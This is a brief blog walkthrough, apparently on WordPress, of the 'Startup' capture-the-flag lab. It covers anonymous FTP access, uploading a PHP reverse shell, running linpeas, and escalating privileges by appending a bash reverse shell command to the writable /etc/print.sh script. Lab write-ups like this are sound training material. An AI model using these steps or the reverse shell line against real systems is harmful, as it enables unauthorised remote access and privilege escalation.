Startup CTF


Run a nmap scan to find for open ports.

Connect to the FTP server as anonymous.

Retrieve the files to find for clues.

Put a php reverse shell script in the FTP folder.

Start a listener.

cat recipe.txt to find the first answer.

Start a python simple server and upload linpeas to the victim box.

Found a interesting file.

Copy the file to the ftp server.

cp /incidents/suspicious.pcapng /var/www/html/files/ftp/

Its a wireshark file, follow the tcp stream to find the password for lennie.


Change user to lennie.

First flag is found.

Head to the scripts folder and examine the files.

We can edit the /etc/print.sh file , edit the file with bash reverse shell script.

echo ‘bash -i >& /dev/tcp/ 0>&1’ >> /etc/print.sh

Start a netcat listener and the final flag is found.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: